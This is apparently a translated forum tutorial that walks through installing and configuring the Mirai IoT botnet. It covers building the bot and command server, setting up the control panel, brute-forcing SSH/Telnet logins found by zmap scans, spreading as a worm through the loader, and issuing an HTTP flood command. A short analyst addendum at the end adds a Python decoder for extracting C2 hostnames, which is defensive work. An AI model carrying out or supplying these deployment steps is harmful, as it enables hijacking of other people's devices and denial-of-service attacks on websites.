Installing and configuring the Mirai IOT botnet

Hacker

I won't give a lot of shit, I'll just say that the software is working, it turns off sites with a bang. And this is the first Russian manual for installing Mirai. "Historical bullshit".

We will need two VPS KVM servers and a domain. Virtualization is exactly KVM, OpenVZ will pass this time.

I take my servers here - https://www.nforce.com/

On one server we will install the botnet itself, on the second we will scan bots (brutalize).

IMPORTANT. Servers must be based on Debian 8 and have at least 1GB of RAM.

Any domain, no difference.

Sorry of course, but I won't tell you how to attach a domain to a VPS. It's not difficult, you can figure it out for yourself.

We connect to our server via PuTTY and start.
Code:
# apt-get update -y
# apt-get upgrade -y
# apt-get install unzip gcc golang electric-fence screen sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y

When installing MySQL, you will need to create a password to access MySQL for the root user. You can come up with a normal password, without any "qwerty"

Write it down somewhere, we'll still need it.
Code:
# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
# bash < <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)
# gvm install go1.4
# gvm use go1.4 [--default]
# gvm install go1.4 -B
# gvm use go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm use go1.5
# gvm install go1.8
# gvm use go1.8

After installing all the utilities, download the bot's source code - https://github.com/jgamblin/Mirai-Source-Code and upload it to the server. Using the wget command, or simply using the WinSCP program.
Code:
# unzip Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string vlmi.su (we write our own domain, which is screwed to the server) and press Enter

Here you will see the following text -

XOR'ing 14 bytes of data...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - there will be a different number for you, so don't worry, everything is correct.

Copy all this text.

Open the table.c file in the mirai/bot folder using the nano editor or WinSCP.

Should see this - https://prnt.sc/gcxa2m

The string add_entry(TABLE_CNC_DOMAIN - everything that is in quotation marks is changed to your text that you just copied. Instead of " 30 ", we write our own number, which we also just copied. We do the same with the add_entry line (TABLE_SCAN_CB_DOMAIN

Save it and close the editor.

Let's move on.

Open the mirai/cnc/main.go file with the editor

We see this - https://prnt.sc/gcxdtz

change "127.0.0.1" to " 127.0.0.1:3306"

"password" is changed to our MySQL password that we entered earlier.

Save the file and close the editor.

Just copy all this shit, I won't tell you why it's necessary -
Code:
# mkdir /etc/xcompile
# cd /etc/xcompile
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
# wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2
# rm *.tar.bz2
# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
# mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l
# export PATH=$PATH:/etc/xcompile/armv4l/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go
# go get github.com/go-sql-driver/mysql
# go get github.com/mattn/go-shellwords

Fucked up.
Code:
# cd Mirai-Source-Code-master/mirai
# ./build.sh debug telnet
# ./build.sh release telnet
# cd Mirai-Source-Code-master/mirai/release
# mv mirai* /var/www/html
# cd /var/www/html
# mkdir bins
# mv * bins/
# cd

Now MySQL.
Code:
# mysql -u root -p

You will be asked for your password here. Enter the password that you previously set.
Code:
# create database mirai;
# use mirai

Now copy all the text from here - https://pastebin.com/QVD48J8s insert, and press Enter.

Copy the text from here - https://pastebin.com/JwYSgE4v

Instead of anna-senpai, write your username. Any. It's the same with myawesomepassword. We will need this data to access the bot's control panel.

It should be like this-REPLACE INTO users VALUES (NULL, 'usersuper41', 'superbotner666', 0, 0, 0, 0, -1, 1, 30, ");

Copy, paste, and press Enter.

Now you can go out.
Code:
# exit

It's almost done.
Code:
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# screen ./cnc

You should see the label MySQL DB opened

Don't close this session, open a new one.

http://prntscr.com/gcxunx instead of vlmi.su write your domain, and click Open.

Enter your username and password. In my case, this is -
usersuper41
superbotner666

That's it, we're in the bot's control panel.

Now we need bots. Everything is simple here, no installations are needed.

Configuring the loader.

Loader is needed so that bots can be added from text files. Let's say we've got a lot of devices ( routers, cameras, phones ) and you need a loader to add them to the bot.

Also loader is a "worm"

They infected one device, and it will brutalize and add bots further down the chain.

We connect to our server via PuTTY and WinSCP.

Using WinSCP, we find the main.c file in the Mirai-Source-Code-master/dlr folder

We write the IP of our server as shown in the screenshot - http://prntscr.com/gde6jr

We leave the commas, as it should be. Save and close it.

Now with PuTTY we go to our server and write -
Code:
# cd Mirai-Source-Code-master/dlr
# chmod 777 *
# ./build.sh
# cd release
# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Now open WinSCP and find the main.c file in the Mirai-Source-Code-master/loader/src folder

Change to your IP address as shown in the screenshot - http://prntscr.com/gdefbr

Save and close it.

Via PuTTY -
Code:
# cd Mirai-Source-Code-master/loader
# ./build.sh

Using WinSCP, open the scanListen.go file, which can be found in the folder Mirai-Source-Code-master/mirai/tools

Changing to your server IP - http://prntscr.com/gdezsh

Then with PuTTY -
Code:
# cd Mirai-Source-Code-master/mirai/tools
# go build scanListen.go

Now we have a new file - scanListen (without .go, just scanListen)

scanListen should be moved to the Mirai-Source-Code-master/loader folder

Just use WinSCP to throw it in the loader folder

Now let's check if everything works
Code:
# ./loader

If you see what is on the screen, then everything is correct - https://prnt.sc/gdei1g

If you encounter any errors, write to the topic and I'll help you.

To load bots from the list, throw the text file in the loader folder and type the command -
Code:
# cat list.txt | ./loader

Everyone, all the bots that you have typed will be with you, will lay down sites on your command.

I personally did not use this method, I found an easier way.

Here we need a second server. Also on Debian 8.
Code:
# apt-get update -y
# apt-get upgrade -y
# apt-get install python-paramiko -y
# apt-get install zmap -y

We need zmap for port scanning. The principle of operation is similar to KPortScan, only 50 times faster.

Copy all the code from here - https://pastebin.com/9tq1pfAv and save as scan.py

Here you can add your own passwords and logins - http://prntscr.com/gdesb1

Don't touch the combo string!

Here you need to register the IP of the server where the bot is located - http://prntscr.com/gdetbn

We change everything and save it.

File scan.py we can send it to any location on our server. On the second server, which is purely for scanning, the one on which the bot is not touched.

We need IP addresses that we will scan.

#zmap -p22-o list.txt -B 100M (you can also scan other ports, I always scanned 22 or 23)

All results will be in the file list.txt

After you have collected the IP (the larger the better ) file list.txt we throw it next to the scan file.py and write -
Code:
# python scan.py list.txt 500

That's it, we sit and watch our botnet grow.

When there are at least 200 bots, you can start loader.

To do this, go to the server where the botnet is installed and -
Code:
# cd Mirai-Source-Code-master/loader
# ulimit -n 9999999
# ./scanListen | ./loader

Now the bot will work on the "worm" principle and finish off more bots.

Command for DDoS attack (you need to enter it in the botnet control panel)
Code:
# http 1.1.1.1 350 domain=1.1.1.1 path=/ conns=999999999

Well, that's all. Thanks for attention.
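For analysts handling a captured sample: the `enc` output quoted in the post is a single-byte XOR encoding, so encoded table entries can be decoded to recover the C2 and scan-callback hostnames as indicators for DNS blocking and detection. The following is an added example, not part of the original post or of the Mirai source; the key 0x22 is inferred from the trailing `\x22` in the quoted output (an encoded NUL terminator), and all function names and the sample buffer are hypothetical.

```python
import re

# Single-byte XOR key. Inferred from the post's sample output: its last byte,
# \x22, is the string's NUL terminator after encoding (0x00 ^ key == key).
TABLE_XOR_KEY = 0x22

_ESCAPED = re.compile(r"\\x([0-9A-Fa-f]{2})")
# Lower-case hostname followed by the NUL that terminates a table entry.
_HOSTNAME = re.compile(rb"(?:[a-z0-9-]{1,63}\.)+[a-z]{2,24}\x00")


def parse_escaped(text):
    """Convert a C-style '\\x41\\x4C...' literal into raw bytes."""
    pairs = _ESCAPED.findall(text)
    if not pairs or _ESCAPED.sub("", text).strip():
        raise ValueError("expected only \\xNN escapes")
    return bytes(int(p, 16) for p in pairs)


def decode_entry(blob, key=TABLE_XOR_KEY):
    """Decode one encoded entry; return (plaintext, encoded_length)."""
    plain = bytes(b ^ key for b in blob)
    if not plain.endswith(b"\x00") or b"\x00" in plain[:-1]:
        raise ValueError("not a single NUL-terminated string; wrong key?")
    return plain[:-1].decode("ascii"), len(blob)


def find_encoded_hostnames(data, key=TABLE_XOR_KEY):
    """Scan a raw buffer (e.g. a sample's data section) for encoded hostnames."""
    plain = bytes(b ^ key for b in data)
    hits = {m.group()[:-1].decode("ascii") for m in _HOSTNAME.finditer(plain)}
    return sorted(hits)


# The encoded bytes quoted in the post above.
PAGE_SAMPLE = (r"\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47"
               r"\x0C\x41\x4D\x4F\x22")
# Constructed buffer: filler bytes around the entry, standing in for a binary.
CONSTRUCTED_BUFFER = b"\x7fELF" + bytes(8) + parse_escaped(PAGE_SAMPLE) + b"\xff\xfe"

if __name__ == "__main__":
    print(decode_entry(parse_escaped(PAGE_SAMPLE)))
    print(find_encoded_hostnames(CONSTRUCTED_BUFFER))
```

The bytes quoted in the post decode to a 17-byte entry holding a placeholder hostname rather than the 14 bytes the post reports.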
 